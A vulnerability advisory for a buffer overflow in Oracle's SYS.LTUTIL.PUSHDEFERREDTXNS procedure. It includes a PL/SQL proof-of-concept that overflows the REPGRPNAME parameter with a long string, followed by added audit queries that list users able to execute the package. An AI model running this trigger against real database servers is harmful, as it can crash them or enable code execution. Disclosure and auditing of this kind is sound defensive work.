#40 - Buffer overflow in procedure PUSHDEFERREDTXNS of LTUTIL package
August 31, 2004
Credit: These vulnerabilities were researched and discovered by Esteban Martínez Fayó of Application Security, Inc.
Risk level: Low
Details:
When the PUSHDEFERREDTXNS procedure is called with a long string in the REPGRPNAME parameter, a buffer overflow occurs.
To reproduce the overflow, execute the following PL/SQL:
DECLARE
  P_REPGRPNAME VARCHAR2(32767);
  AAA VARCHAR2(32767);
BEGIN
  AAA:='A';
  -- 13 doublings: 2^13 = 8192 characters
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  AAA:=AAA || AAA;
  -- tripled: 24576 characters, still within VARCHAR2(32767)
  AAA:=AAA || AAA || AAA;
  P_REPGRPNAME := AAA;
  SYS.LTUTIL.PUSHDEFERREDTXNS(REPGRPNAME => P_REPGRPNAME);
END;
Analysis:
This vulnerability can be exploited by members of the WMSYS or SYSDBA role and by users granted execute permission on the LTUTIL package.
Exploitation of this vulnerability allows an attacker to execute arbitrary code. It can also be exploited to cause a denial of service (DoS) by killing the Oracle server process.
Vendor Fix:
Fixed in Patchset 4 (9.2.0.5). 10g is not vulnerable.
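A DBA-side check for the exposure described under Analysis, as an added example that is not part of the original advisory: it shows the server banner to compare against the fixed patchset and lists who can execute LTUTIL, directly or through nested roles. It assumes a session that can read the standard dictionary views V$VERSION, DBA_TAB_PRIVS, DBA_ROLE_PRIVS and DBA_USERS.

```sql
-- Added audit example, not from the advisory. Run as a DBA.

-- 1. Server version. The advisory gives Patchset 4 (9.2.0.5) as the fix
--    and states that 10g is not vulnerable.
SELECT banner
FROM   v$version;

-- 2. Direct EXECUTE grants on any package named LTUTIL.
--    A grantee of PUBLIC means every database user can call it.
SELECT owner, table_name, grantee, grantable
FROM   dba_tab_privs
WHERE  table_name = 'LTUTIL'
AND    privilege  = 'EXECUTE'
ORDER  BY owner, grantee;

-- 3. Users who inherit that EXECUTE through a role.
--    The hierarchy starts at role grants whose role holds EXECUTE directly,
--    then follows roles that are themselves granted to other roles or users.
SELECT u.username, u.account_status
FROM   dba_users u
WHERE  u.username IN (
         SELECT grantee
         FROM   dba_role_privs
         START WITH granted_role IN (
                  SELECT grantee
                  FROM   dba_tab_privs
                  WHERE  table_name = 'LTUTIL'
                  AND    privilege  = 'EXECUTE')
         CONNECT BY PRIOR grantee = granted_role
       )
ORDER  BY u.username;
```

Grantees returned by queries 2 and 3 that have no need for the package are candidates for having EXECUTE revoked until the patchset is applied.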